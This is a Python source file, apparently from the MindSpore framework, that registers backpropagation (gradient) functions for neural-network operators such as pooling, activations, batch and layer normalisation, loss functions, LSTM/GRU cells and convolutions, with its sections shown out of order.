strides=self.strides,
pad_mode=self.pad_mode)
def bprop(x1, x2, grad, out, dout):
dx1 = zeros_like(x1)
dx2 = zeros_like(x2)
dgrad = maxpool_grad_grad(x1, x2, dout)
return (dx1, dx2, dgrad)
return bprop
@bprop_getters.register(G.MaxPoolGradGrad)
def get_bprop_max_pool_grad_grad_grad(self):
"""Grad definition for `MaxPoolGradGrad` operation."""
maxpool_grad = G.MaxPoolGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
def bprop(x1, x2, grad, out, dout):
dx1 = zeros_like(x1)
dx2 = zeros_like(x2)
dgrad = maxpool_grad(x1, x2, dout)
return (dx1, dx2, dgrad)
return bprop
@bprop_getters.register(P.MaxPool)
def get_bprop_max_pool_grad(self):
"""Grad definition for `MaxPool` operation."""
maxpool_grad = G.MaxPoolGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode,
data_format=self.format)
def bprop(x, out, dout):
dx = maxpool_grad(x, out, dout)
return (dx,)
return bprop
def _windowed_output_size(input_size, ksize, stride, pad_mode):
"""
helper func for AvgPoolGrad
"""
tmp_output = 0
tmp_pad_need = 0
tmp_pad_before = 0
tmp_pad_after = 0
if pad_mode == 'VALID':
tmp_output = (input_size - ksize + stride) // stride
tmp_pad_before = 0
tmp_pad_after = 0
elif pad_mode == 'SAME':
tmp_output = (input_size + stride - 1) // stride
tmp_pad_need = max(0, (tmp_output - 1) * stride + ksize - input_size)
tmp_pad_before = tmp_pad_need // 2
tmp_pad_after = tmp_pad_need - tmp_pad_before
return tmp_output, tmp_pad_before, tmp_pad_after
@constexpr
def _get_mean_matrix(x_shape, ksize, stride, pad_mode, x_dtype):
"""
helper func for AvgPoolGrad.
`assist_input_matrix` is a 2d matrix with input_shape after padding,
the value of element which is padded is 0, else are 1.
For each element of output, it is mapped for slide window: `[h*h_stride : h*h_stride + h_ksize,
w*w_stride : w*w_stride + w_ksize]` of `assist_input_matrix`, so the sum of slide window is the
number of input that associate with output element.
"""
n_input, c_input, h_input, w_input = x_shape
h_ksize, w_ksize = ksize[2], ksize[3]
h_stride, w_stride = stride[2], stride[3]
n_output = n_input
c_output = c_input
h_output, w_output = 0, 0
pad_top, pad_bottom, pad_left, pad_right = 0, 0, 0, 0
h_output, pad_top, pad_bottom = _windowed_output_size(h_input, h_ksize,
h_stride, pad_mode)
w_output, pad_left, pad_right = _windowed_output_size(w_input, w_ksize,
w_stride, pad_mode)
output_size = n_output * c_output * h_output * w_output
output_shape = (n_output, c_output, h_output, w_output)
output = np.array([0.0] * output_size)
output = np.reshape(output, output_shape)
in_shape_after_padding_2d = (h_input + pad_top + pad_bottom, w_input + pad_left + pad_right)
assist_input_matrix = np.ones(in_shape_after_padding_2d).astype(np.float32)
if pad_top > 0:
assist_input_matrix[:pad_top, :] = 0
if pad_bottom > 0:
assist_input_matrix[-pad_bottom:, :] = 0
if pad_left > 0:
assist_input_matrix[:, :pad_left] = 0
if pad_right > 0:
assist_input_matrix[:, -pad_right:] = 0
for h in range(h_output):
for w in range(w_output):
curr_input = assist_input_matrix[h*h_stride : h*h_stride + h_ksize, w*w_stride : w*w_stride + w_ksize]
curr_sum = np.sum(curr_input)
if curr_sum > 0:
output[:, :, h, w] = 1. / curr_sum
return Tensor(output, x_dtype)
@constexpr
def _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype):
kernel_matrix = np.ones(kernel_matrix_shape)
return Tensor(kernel_matrix, x_dtype)
@bprop_getters.register(P.AvgPool)
def get_bprop_avg_pool_grad(self):
"""Grad definition for `AvgPool` operation."""
# the parameter of AvgPoolGrad in GPU and TBE/CPU is not same
if self.target == "GPU":
avgpool_grad_gpu = G.AvgPoolGradGpu(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode,
data_format=self.format)
def bprop_gpu(x, out, dout):
dx = avgpool_grad_gpu(x, out, dout)
return (dx,)
bprop_fn = bprop_gpu
elif self.target == "CPU":
avgpool_grad_cpu = G.AvgPoolGradCpu(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode,
data_format=self.format)
def bprop_cpu(x, out, dout):
dx = avgpool_grad_cpu(x, out, dout)
return (dx,)
bprop_fn = bprop_cpu
elif self.target == "GE":
avgpool_grad_ge = G.AvgPoolGrad(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
shape_op = P.Shape()
def bprop_ge(x, out, dout):
dx = avgpool_grad_ge(shape_op(x), dout)
return (dx,)
bprop_fn = bprop_ge
else:
avgpool_grad_vm = G.AvgPoolGradVm(
kernel_size=self.kernel_size,
strides=self.strides,
pad_mode=self.pad_mode)
k_size_nchw = avgpool_grad_vm.kernel_size
stride_nchw = avgpool_grad_vm.strides
pad_mode = self.pad_mode
def bprop_vm(x, out, dout):
x_shape_nchw = F.shape(x)
x_dtype = F.dtype(x)
kernel_matrix_shape = (1, x_shape_nchw[1],
k_size_nchw[2],
k_size_nchw[3])
mean_matrix = _get_mean_matrix(x_shape_nchw, k_size_nchw, stride_nchw, pad_mode, x_dtype)
kernel_matrix = _get_kernel_matrix(x_shape_nchw, kernel_matrix_shape, pad_mode, x_dtype)
dx = avgpool_grad_vm(x_shape_nchw, dout, mean_matrix, kernel_matrix)
return (dx,)
bprop_fn = bprop_vm
return bprop_fn
@bprop_getters.register(P.DropoutGenMask)
def get_bprop_dropout_gen_mask(self):
"""Grad definition for `DropoutGenMask` operation."""
def bprop(shape, keep_prob, out, dout):
return (zeros_like(shape), zeros_like(keep_prob))
return bprop
@bprop_getters.register(P.DropoutDoMask)
def get_bprop_dropout_do_mask(self):
"""Grad definition for `DropoutDoMask` operation."""
do_mask = P.DropoutDoMask()
def bprop(x, y, keep_prob, out, dout):
return (do_mask(dout, y, keep_prob), zeros_like(y), zeros_like(keep_prob))
return bprop
@bprop_getters.register(P.Mish)
def get_bprop_mish(self):
"""Grad definition for `Mish` operation."""
tanh = P.Tanh()
tanh_grad = SG.TanhGrad()
softplus = P.Softplus()
softplus_grad = G.SoftplusGrad()
def bprop(x, out, dout):
dx1 = tanh(softplus(x))
dx2 = softplus_grad(tanh_grad(dx1, x * dout), x)
dx = (dx1 * dout + dx2)
return (dx,)
return bprop
@bprop_getters.register(P.SeLU)
def get_bprop_selu(self):
"""Grad definition for `SeLU` operation."""
scale = 1.0507009873554804934193349852946
elu_grad = G.EluGrad()
def bprop(x, out, dout):
dx = elu_grad(dout, out) * scale
return (dx,)
return bprop
@bprop_getters.register(P.MulNoNan)
def get_bprop_mul_no_nan(self):
"""Grad definition for `MulNoNan` operation."""
mul_no_nan = P.MulNoNan()
reduce_sum = P.ReduceSum()
reshape = P.Reshape()
def bprop(x, y, out, dout):
x_shape = F.shape(x)
y_shape = F.shape(y)
dx = mul_no_nan(dout, y)
dy = mul_no_nan(x, dout)
broadcast_x, broadcast_y = F.broadcast_gradient_args(x_shape, y_shape)
if broadcast_x != ():
dx = reshape(reduce_sum(dx, broadcast_x), x_shape)
if broadcast_y != ():
dy = reshape(reduce_sum(dy, broadcast_y), y_shape)
return dx, dy
return bprop
@bprop_getters.register(P.ReLU)
def get_bprop_relu(self):
"""Grad definition for `ReLU` operation."""
input_grad = G.ReluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, out)
return (dx,)
return bprop
@bprop_getters.register(G.ReluGrad)
def get_bprop_relu_grad(self):
"""Grad definition for `ReLUGrad` operation."""
input_grad = G.ReluGrad()
def bprop(grad, y, out, dout):
dgrad = input_grad(dout, y)
return dgrad, zeros_like(y)
return bprop
@bprop_getters.register(P.ReLU6)
def get_bprop_relu6(self):
"""Grad definition for `ReLU6` operation."""
input_grad = G.ReLU6Grad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.ReLUV2)
def get_bprop_relu_v2(self):
"""Grad definition for `ReLUV2` operation."""
input_grad = G.ReluGradV2()
def bprop(x, out, dout):
mask = out[1]
dx = input_grad(dout[0], mask)
return (dx,)
return bprop
@bprop_getters.register(P.HSwish)
def get_bprop_hswish(self):
"""Grad definition for `HSwish` operation."""
input_grad = G.HSwishGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.HSigmoid)
def get_bprop_hsigmoid(self):
"""Grad definition for `HSigmoid` operation."""
input_grad = G.HSigmoidGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.Elu)
def get_bprop_elu(self):
"""Grad definition for `Elu` operation."""
input_grad = G.EluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, out)
return (dx,)
return bprop
@bprop_getters.register(P.Sigmoid)
def get_bprop_sigmoid(self):
"""Grad definition for `Sigmoid` operation."""
input_grad = G.SigmoidGrad()
def bprop(x, out, dout):
dx = input_grad(out, dout)
return (dx,)
return bprop
@bprop_getters.register(G.SigmoidGrad)
def get_bprop_sigmoid_grad(self):
"""Grad definition for `SigmoidGrad` operation."""
sigmoid_grad = G.SigmoidGrad()
def bprop(y, grad, out, dout):
dy = dout * grad * (1. - 2 * y)
dgrad = sigmoid_grad(y, dout)
return dy, dgrad
return bprop
@constexpr
def _get_transpose_axis(x_shp, axis):
rank = len(x_shp)
if axis < 0:
axis += rank
reverse_axis = [i for i in range(rank)]
reverse_axis[axis] = rank - 1
reverse_axis[rank - 1] = axis
return tuple(reverse_axis)
@bprop_getters.register(P.Softmax)
def get_bprop_softmax(self):
"""Grad definition for `Softmax` operation."""
sum_func = P.ReduceSum(keep_dims=True)
sub = P.Sub()
mul = P.Mul()
get_shape = P.Shape()
transpose = P.Transpose()
axis = self.axis
if not isinstance(axis, int):
axis = axis[0]
def bprop(x, out, dout):
# dx = (dout - sum(dout * out)) * out
# This formula is correct only when the `axis` is the last dimension.
# In order to support the scenario where the `axis` is other values,
# we transpose the data of the `axis` dimension to the last dimension for calculation,
# and then transpose it back after the calculation.
reverse_axis = _get_transpose_axis(get_shape(x), axis)
out = transpose(out, reverse_axis)
dout = transpose(dout, reverse_axis)
dx = mul(out, sub(dout, sum_func(mul(out, dout), -1)))
dx = transpose(dx, reverse_axis)
return (dx,)
return bprop
@bprop_getters.register(P.LogSoftmax)
def get_bprop_log_softmax(self):
"""Grad definition for `LogSoftmax` operation."""
logsoftmax_grad = G.LogSoftmaxGrad(self.axis)
def bprop(x, out, dout):
dx = logsoftmax_grad(out, dout)
return (dx,)
return bprop
@bprop_getters.register(P.Softplus)
def get_bprop_softplus(self):
"""Grad definition for `Softplus` operation."""
softplus_grad = G.SoftplusGrad()
def bprop(x, out, dout):
dx = softplus_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.Softsign)
def get_bprop_softsign(self):
"""Grad definition for `Softsign` operation."""
mul = P.Mul()
absolute = P.Abs()
div = P.Div()
square = P.Square()
def bprop(x, out, dout):
dx = mul(dout, div(1, square(1 + absolute(x))))
return (dx,)
return bprop
@bprop_getters.register(P.Tanh)
def get_bprop_tanh(self):
"""Grad definition for `Tanh` operation."""
tanh_grad = SG.TanhGrad()
def bprop(x, out, dout):
dx = tanh_grad(out, dout)
return (dx,)
return bprop
@bprop_getters.register(G.TanhGrad)
def get_bprop_tanh_grad(self):
"""Grad definition for `TanhGrad` operation."""
tanh_grad = G.TanhGrad()
def bprop(y, grad, out, dout):
dy = dout * -2.0 * grad * y
dgrad = tanh_grad(y, dout)
return dy, dgrad
return bprop
@bprop_getters.register(P.Gelu)
def get_bprop_gelu(self):
"""Grad definition for `Gelu` operation."""
input_grad = G.GeluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x, out)
return (dx,)
return bprop
@bprop_getters.register(P.FastGelu)
def get_bprop_fast_gelu(self):
"""Grad definition for `FastGelu` operation."""
input_grad = G.FastGeluGrad()
def bprop(x, out, dout):
dx = input_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.FusedBatchNorm)
def get_bprop_fused_batch_norm(self):
"""Grad definition for `FusedBatchNorm` operation."""
input_grad = G.FusedBatchNormGrad(self.epsilon, self.momentum)
target_cpu = False
if self.target == "CPU":
input_grad = G.FusedBatchNormGradCPU(self.epsilon, self.momentum)
target_cpu = True
def bprop(x, scale, b, mean, variance, out, dout):
saved_mean = out[3]
saved_variance = out[4]
if target_cpu:
out = input_grad(dout[0], x, scale, b, saved_mean, saved_variance)
else:
out = input_grad(dout[0], x, scale, saved_mean, saved_variance)
dx = out[0]
dscale = out[1]
dbias = out[2]
return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.FusedBatchNormEx)
def get_bprop_fused_batch_norm_ex(self):
"""Grad definition for `FusedBatchNormEx` operation."""
input_grad = G.FusedBatchNormGradEx(self.epsilon, self.momentum, self.format)
def bprop(x, scale, b, mean, variance, out, dout):
saved_mean = out[3]
saved_variance = out[4]
reserve = out[5]
out = input_grad(dout[0], x, scale, saved_mean, saved_variance, reserve)
dx = out[0]
dscale = out[1]
dbias = out[2]
return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.InstanceNorm)
def get_bprop_instance_norm(self):
"""Grad definition for `InstanceNorm` operation."""
is_training = self.is_training
input_grad = G.InstanceNormGrad(is_training, self.epsilon, self.momentum)
def bprop(x, gamma, beta, mean, variance, out, dout):
saved_mean = out[1]
saved_variance = out[2]
out = input_grad(dout[0], x, gamma, saved_mean, saved_variance)
dx = out[0]
dgamma = out[1]
dbeta = out[2]
return dx, dgamma, dbeta, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.BatchNorm)
def get_bprop_batch_norm(self):
"""Grad definition for `BatchNorm` operation."""
is_training = self.is_training
input_grad = G.BatchNormGrad(is_training, self.epsilon)
def bprop(x, scale, b, mean, variance, out, dout):
if is_training:
saved_reserve_1 = out[3]
saved_reserve_2 = out[4]
else:
saved_reserve_1 = mean
saved_reserve_2 = variance
out = input_grad(dout[0], x, scale, saved_reserve_1, saved_reserve_2)
dx = out[0]
dscale = out[1]
dbias = out[2]
return dx, dscale, dbias, zeros_like(mean), zeros_like(variance)
return bprop
@bprop_getters.register(P.LayerNorm)
def get_bprop_layer_norm(self):
"""Grad definition for `LayerNorm` operation."""
layer_norm_grad = G.LayerNormGrad(self.begin_norm_axis, self.begin_params_axis)
def bprop(x, gamma, beta, out, dout):
dx, d_gamma, d_beta = layer_norm_grad(
x, dout[0], out[2], out[1], gamma)
return dx, d_gamma, d_beta
return bprop
@bprop_getters.register(G.LayerNormGrad)
def get_bprop_layer_norm_grad(self):
"""Grad definition for `LayerNormGrad` operation."""
layer_norm_grad_grad = G.LayerNormGradGrad(self.begin_norm_axis, self.begin_params_axis)
def bprop(x, dy, variance, mean, gamma, out, dout):
d_x, d_dy, d_gamma = layer_norm_grad_grad(
x, dy, variance, mean, gamma, dout[0], dout[1], dout[2])
return d_x, d_dy, zeros_like(variance), zeros_like(mean), d_gamma
return bprop
@bprop_getters.register(P.L2Normalize)
def get_bprop_l2normalize(self):
"""Grad definition for `L2Normalize` operation."""
input_grad = G.L2NormalizeGrad(self.axis, self.epsilon)
def bprop(x, out, dout):
dx = input_grad(x, out, dout)
return (dx,)
return bprop
@bprop_getters.register(P.SoftmaxCrossEntropyWithLogits)
def get_bprop_softmax_cross_entropy_with_logits(self):
"""Grad definition for `SoftmaxCrossEntropyWithLogits` operation."""
expand = P.ExpandDims()
def bprop(logits, labels, out, dout):
grad = out[1]
grad = grad * expand(dout[0], -1)
return grad, zeros_like(labels)
return bprop
@bprop_getters.register(P.NLLLoss)
def get_bprop_nll_loss(self):
"""Grad definition for `NLLLoss` operation."""
nll_loss_grad = G.NLLLossGrad(reduction=self.reduction)
def bprop(x, target, weight, out, dout):
total_weight = out[1]
dout_x = dout[0]
dx = nll_loss_grad(x, dout_x, target, weight, total_weight)
return dx, zeros_like(target), zeros_like(weight)
return bprop
@bprop_getters.register(P.SparseSoftmaxCrossEntropyWithLogits)
def get_bprop_sparse_softmax_cross_entropy_with_logits(self):
"""Grad definition for `SparseSoftmaxCrossEntropyWithLogits` operation."""
is_grad = self.is_grad
grad_op = P.SparseSoftmaxCrossEntropyWithLogits(is_grad=True)
def bprop(logits, labels, out, dout):
grad = out[0]
if not is_grad:
# if construct use loss
grad = grad_op(logits, labels)
grad = F.depend(grad, out)
grad = grad * dout
return grad, zeros_like(labels)
return bprop
@bprop_getters.register(P.ResizeBilinear)
def get_bprop_resize_bilinear(self):
"""Grad definition for `ResizeBilinear` operation."""
resize_grad = G.ResizeBilinearGrad(self.align_corners)
def bprop(x, out, dout):
dx = resize_grad(dout, x)
return (dx,)
return bprop
@bprop_getters.register(P.OneHot)
def get_bprop_onehot(self):
"""Grad definition for `OneHot` operation."""
def bprop(indices, depth, on_value, off_value, out, dout):
return zeros_like(indices), zeros_like(depth), zeros_like(on_value), zeros_like(off_value)
return bprop
@constexpr
def _range_op(start, limit, delta, dtype):
"""helper function for Grad TopK"""
output_tensor = Tensor(list(range(start, limit, delta)), dtype)
return output_tensor
@constexpr
def _get_1d_shape(in_shape):
"""helper function for Grad TopK"""
out_shape = 1
for i in in_shape:
out_shape *= i
return (out_shape,)
@bprop_getters.register(P.TopK)
def get_bprop_top_kv2(self):
"""Grad definition for `TopK` operation."""
scatter = P.ScatterNd()
expand_dims = P.ExpandDims()
shape_op = P.Shape()
reshape_op = P.Reshape()
dtype = P.DType()
def bprop(input_x, k, out, dout):
in_shape = shape_op(input_x)
in_lastdim = in_shape[-1]
indices = out[1]
ind_shape = shape_op(indices)
ind_lastdim = ind_shape[-1]
ind_2d = reshape_op(indices, (-1, ind_lastdim))
outerdim = shape_op(ind_2d)[0]
# [0, outterdim, 2*outerdim, ..., (k-1)*outerdim]
indices_dtype = dtype(indices)
range_flatten_index = _range_op(0, outerdim * in_lastdim, in_lastdim, indices_dtype)
# expand_dims to (k, 1), then broadcast
ind = reshape_op(ind_2d + expand_dims(range_flatten_index, -1), (-1,))
in_shape_1d = _get_1d_shape(in_shape)
out_grad = reshape_op(
scatter(
expand_dims(ind, -1),
reshape_op(dout[0], (-1,)),
in_shape_1d),
in_shape)
return out_grad, zeros_like(k)
return bprop
@bprop_getters.register(P.SmoothL1Loss)
def get_bprop_smooth_l1_loss(self):
"""Grad definition for `SmoothL1Loss` operation."""
grad = G.SmoothL1LossGrad(self.beta)
def bprop(prediction, target, out, dout):
dx = grad(prediction, target, dout)
dy = grad(target, prediction, dout)
return dx, dy
return bprop
@bprop_getters.register(P.L2Loss)
def get_bprop_l2_loss(self):
"""Grad definition for `L2Loss` operation."""
def bprop(x, out, dout):
dx = x * dout
return (dx,)
return bprop
@bprop_getters.register(P.RNNTLoss)
def get_bprop_rnnt_loss(self):
"""Grad definition for `RNNTLoss` operation."""
def bprop(acts, labels, act_lens, label_lens, out, dout):
grad = out[1]
return grad, zeros_like(labels), zeros_like(act_lens), zeros_like(label_lens)
return bprop
@bprop_getters.register(P.PReLU)
def get_bprop_prelu(self):
"""Grad definition for `PReLU` operation."""
grad = G.PReLUGrad()
def bprop(x, w, out, dout):
dx, dw = grad(dout, x, w)
return dx, dw
return bprop
@bprop_getters.register(P.LSTM)
def get_bprop_lstm(self):
"""Grad definition for `LSTM` operation."""
lstm_grad_data = G.LSTMGradData(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
has_bias=self.has_bias,
bidirectional=self.bidirectional,
dropout=self.dropout
)
lstm_grad_weight = G.LSTMGradWeight(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
has_bias=self.has_bias,
bidirectional=self.bidirectional,
dropout=self.dropout
)
lstm_grad = G.LSTMGrad(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
has_bias=self.has_bias,
bidirectional=self.bidirectional,
dropout=self.dropout
)
def bprop(x, hx, cx, w, out, dout):
y, _, _, reserve, state = out
dy, dhy, dcy, _, _ = dout
dx, dhx, dcx = lstm_grad_data(y, dy, dhy, dcy, w, hx, cx, reserve, state)
dw = lstm_grad_weight(F.depend(x, dx), hx, y, reserve, state)
return dx, dhx, dcx, dw
#
def bprop_cpu(x, hx, cx, w, out, dout):
y, hy, cy, reserve, _ = out
dy, dhy, dcy, _, _ = dout
dx, dhx, dcx, dw = lstm_grad(x, hx, cx, w, y, hy, cy, dy, dhy, dcy, reserve)
return dx, dhx, dcx, dw
if context.get_context('device_target') == "CPU":
return bprop_cpu
return bprop
@bprop_getters.register(P.DynamicRNN)
def get_bprop_dynamic_rnn(self):
"""Grad definition for `DynamicRNN` operation."""
dynamic_rnn_grad = G.DynamicRNNGrad(cell_type=self.cell_type,
direction=self.direction,
cell_depth=self.cell_depth,
use_peephole=self.use_peephole,
keep_prob=self.keep_prob,
cell_clip=self.cell_clip,
num_proj=self.num_proj,
time_major=self.time_major,
forget_bias=self.forget_bias)
expand_dims = P.ExpandDims()
def bprop(x, w, b, seq_length, init_h, init_c, out, dout):
dy, dh, dc, _, _, _, _, _, = dout
dh = dh[-1]
dc = dc[-1]
y, h, c, i, j, f, o, tanhct = out
dw, db, dx, dh_prev, dc_prev = dynamic_rnn_grad(x, w, b, y, init_h[0], init_c[0], h,
c, dy, dh, dc, i, j, f, o, tanhct)
dh_prev = expand_dims(dh_prev, 0)
dc_prev = expand_dims(dc_prev, 0)
return dx, dw, db, (0), dh_prev, dc_prev
return bprop
@bprop_getters.register(P.DynamicGRUV2)
def get_bprop_dynamic_gru_v2(self):
"""Grad definition for `DynamicGRUV2` operation."""
dynamic_gru_v2_grad = G.DynamicGRUV2Grad(self.direction, self.cell_depth, self.keep_prob, self.cell_clip,
self.num_proj, self.time_major, self.gate_order,
self.reset_after)
def bprop(x, winput, whidden, binput, bhidden, seq, init_h, out, dout):
y, out_h, update, reset, new, hidden_new = out
dy, dout_h, _, _, _, _ = dout
dw_input, dw_hidden, db_input, db_hidden, dx, dh_prev = dynamic_gru_v2_grad(x, winput, whidden, y, init_h,
out_h, dy, dout_h[-1], update,
reset, new, hidden_new, None, None)
return dx, dw_input, dw_hidden, db_input, db_hidden, (0), dh_prev
return bprop
@bprop_getters.register(P.SigmoidCrossEntropyWithLogits)
def get_bprop_sigmoid_crossentropy_with_logits(self):
"""Grad definition for `SigmoidCrossEntropyWithLogits` operation."""
op = G.SigmoidCrossEntropyWithLogitsGrad()
def bprop(x, y, out, dout):
dx = op(x, y, dout)
return (dx, zeros_like(y))
return bprop
@bprop_getters.register(P.Pad)
def get_bprop_pad(self):
"""Grad definition for `Pad` operation."""
shape_op = P.Shape()
paddings = self.paddings
def bprop(x, out, dout):
begin = ()
for item in paddings:
begin += (item[0],)
shp = shape_op(x)
dx = P.Slice()(dout, begin, shp)
return (dx,)
return bprop
@bprop_getters.register(P.MirrorPad)
def get_bprop_mirror_pad(self):
"""Grad definition for `MirrorPad` operation."""
mirror_pad_grad = G.MirrorPadGrad(self.mode)
def bprop(x, paddings, out, dout):
dx = mirror_pad_grad(dout, paddings)
return (dx, zeros_like(paddings))
return bprop
@bprop_getters.register(P.ROIAlign)
def get_bprop_roi_align(self):
"""Grad definition for `ROIAlign` operation."""
shape_op = P.Shape()
pooled_height = self.pooled_height
pooled_width = self.pooled_width
spatial_scale = self.spatial_scale
sample_num = self.sample_num
def bprop(inputs, rois, out, dout):
inputs_shape = shape_op(inputs)
dx = G.ROIAlignGrad(inputs_shape,
pooled_height,
pooled_width,
spatial_scale,
sample_num,
)(dout, rois)
return dx, zeros_like(rois)
return bprop
@bprop_getters.register(P.Conv2DBackpropInput)
def get_bprop_conv2d_backprop_input(self):
"""Grad definition for `Conv2DBackpropInput` operation."""
filter_grad = G.Conv2DBackpropFilter(
self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
input_grad = P.Conv2D(
self.out_channel, self.kernel_size, pad_mode=self.pad_mode.lower(), pad=self.pad,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
def bprop(x, w, f_sizes, out, dout):
dx = input_grad(dout, w)
if env_force_bprop_seq == '1':
x = F.depend(x, dx)
dw = filter_grad(x, dout, F.shape(w))
return dx, dw, zeros_like(f_sizes)
return bprop
@bprop_getters.register(P.BinaryCrossEntropy)
def get_bprop_binary_cross_entropy(self):
"""Grad definition for `BinaryCrossEntropy` operation."""
grad = G.BinaryCrossEntropyGrad(self.reduction)
def bprop(x, y, weight, out, dout):
dx = grad(x, y, dout, weight)
return dx, zeros_like(y), zeros_like(weight)
return bprop
@bprop_getters.register(P.KLDivLoss)
def get_bprop_kl_div_loss(self):
"""Grad definition for `KLDivLoss` operation."""
grad = G.KLDivLossGrad(self.reduction)
def bprop(x, y, out, dout):
dx, dy = grad(x, y, dout)
return dx, dy
return bprop
@bprop_getters.register(P.Dropout)
def get_bprop_dropout(self):
"""Grad definition for `Dropout` operation."""
grad = G.DropoutGrad(self.keep_prob)
def bprop(x, out, dout):
_, mask = out
dy, _ = dout
dx = grad(dy, mask)
return (dx,)
return bprop
@bprop_getters.register(P.CTCLoss)
def get_bprop_ctc_loss(self):
"""Grad definition for `CTCLoss` operation"""
expand = P.ExpandDims()
def bprop(inputs, labels_indices, labels_values, sequence_length, out, dout):
grad_loss = out[1]
grad = grad_loss * expand(dout[0], -1)
return grad, zeros_like(labels_indices), zeros_like(labels_values), zeros_like(sequence_length)
return bprop
@bprop_getters.register(P.BasicLSTMCell)
def get_bprop_basic_lstm_cell(self):
"""Grad definition for `BasicLSTMCell` operation."""
basic_lstm_cell_cstate_grad = G.BasicLSTMCellCStateGrad(
forget_bias=self.forget_bias,
activation=self.activation
)
basic_lstm_cell_weight_grad = G.BasicLSTMCellWeightGrad()
basic_lstm_cell_input_grad = G.BasicLSTMCellInputGrad(keep_prob=self.keep_prob)
def bprop(x, h, c, w, b, out, dout):
_, _, it, jt, ft, ot, tanhct = out
dct, dht, _, _, _, _, _ = dout
dgate, dct_1 = basic_lstm_cell_cstate_grad(c, dht, dct, it, jt, ft, ot, tanhct)
dxt, dht = basic_lstm_cell_input_grad(dgate, w)
dw, db = basic_lstm_cell_weight_grad(F.depend(x, dxt), h, dgate)
return dxt, dht, dct_1, dw, db
return bprop
@bprop_getters.register(P.LRN)
def get_bprop_lrn(self):
"""Grad definition for `LRN` operation."""
grad = G.LRNGrad(self.depth_radius, self.bias, self.alpha, self.beta)
def bprop(x, out, dout):
dx = grad(dout, x, out)
return (dx,)
return bprop
| 31.165737 | 119 | 0.635109 |
import os
import numpy as np
from mindspore.ops import _selected_grad_ops as SG
from mindspore.ops.primitive import constexpr
from mindspore.common.tensor import Tensor
from mindspore.ops.operations import nn_ops as nps
from .grad_base import bprop_getters
from .. import functional as F
from .. import operations as P
from ...common import dtype as mstype
from ..composite.multitype_ops.zeros_like_impl import zeros_like
from ..operations import _grad_ops as G
from ..operations import _inner_ops as inner
from ... import context
env_force_bprop_seq = os.getenv("ENV_FORCE_BPROP_SEQ")
@bprop_getters.register(P.BiasAdd)
def get_bprop_bias_add(self):
bias_grad = SG.BiasAddGrad(self.data_format)
def bprop(x, w, out, dout):
return dout, bias_grad(dout)
return bprop
@bprop_getters.register(P.Conv2D)
def get_bprop_conv2d(self):
input_grad = P.Conv2DBackpropInput(
self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
filter_grad = G.Conv2DBackpropFilter(
self.out_channel, self.kernel_size, self.pad_mode, self.pad, self.pad_list, mode=self.mode,
dilation=self.dilation, stride=self.stride, group=self.group, data_format=self.format
)
get_shape = P.Shape()
def bprop(x, w, out, dout):
dx = input_grad(dout, w, get_shape(x))
if env_force_bprop_seq == '1':
x = F.depend(x, dx)
dw = filter_grad(dout, x, get_shape(w))
return dx, dw
return bprop
@bprop_getters.register(nps.Conv3D)
def get_bprop_conv3d(self):
input_grad = nps.Conv3DBackpropInput(
self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
filter_grad = G.Conv3DBackpropFilter(
self.out_channel, self.kernel_size, self.mode, pad_mode=self.pad_mode,
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
get_shape = P.Shape()
def bprop(x, w, out, dout):
dx = input_grad(w, dout, get_shape(x))
dw = filter_grad(x, dout, get_shape(w))
return dx, dw
return bprop
@bprop_getters.register(nps.Conv3DTranspose)
def get_bprop_conv3d_transpose(self):
input_grad = nps.Conv3D(
out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
filter_grad = G.Conv3DBackpropFilter(
out_channel=self.in_channel, kernel_size=self.kernel_size, mode=self.mode, pad_mode="pad",
pad=self.pad, stride=self.stride, dilation=self.dilation, group=self.group, data_format=self.data_format
)
input_size = self.input_size
def bprop(x, w, out, dout):
dx = input_grad(dout, w)
dw = filter_grad(dout, x, F.shape(w))
return dx, dw, zeros_like(input_size)
return bprop
@bprop_getters.register(inner.ExtractImagePatches)
def get_bprop_extract_image_patches(self):
get_shape = P.Shape()
reshape = P.Reshape()
extract_image_patches = inner.ExtractImagePatches(ksizes=self.ksizes,
strides=self.strides,
rates=self.rates,
padding=self.padding)
concat = P.Concat(axis=-1)
expand_dims = P.ExpandDims()
scatter_nd = P.ScatterNd()
dtype = P.DType()
fill = P.Fill()
slice_op = P.Slice()
transpose = P.Transpose()
cast = P.Cast()
matmul = P.MatMul()
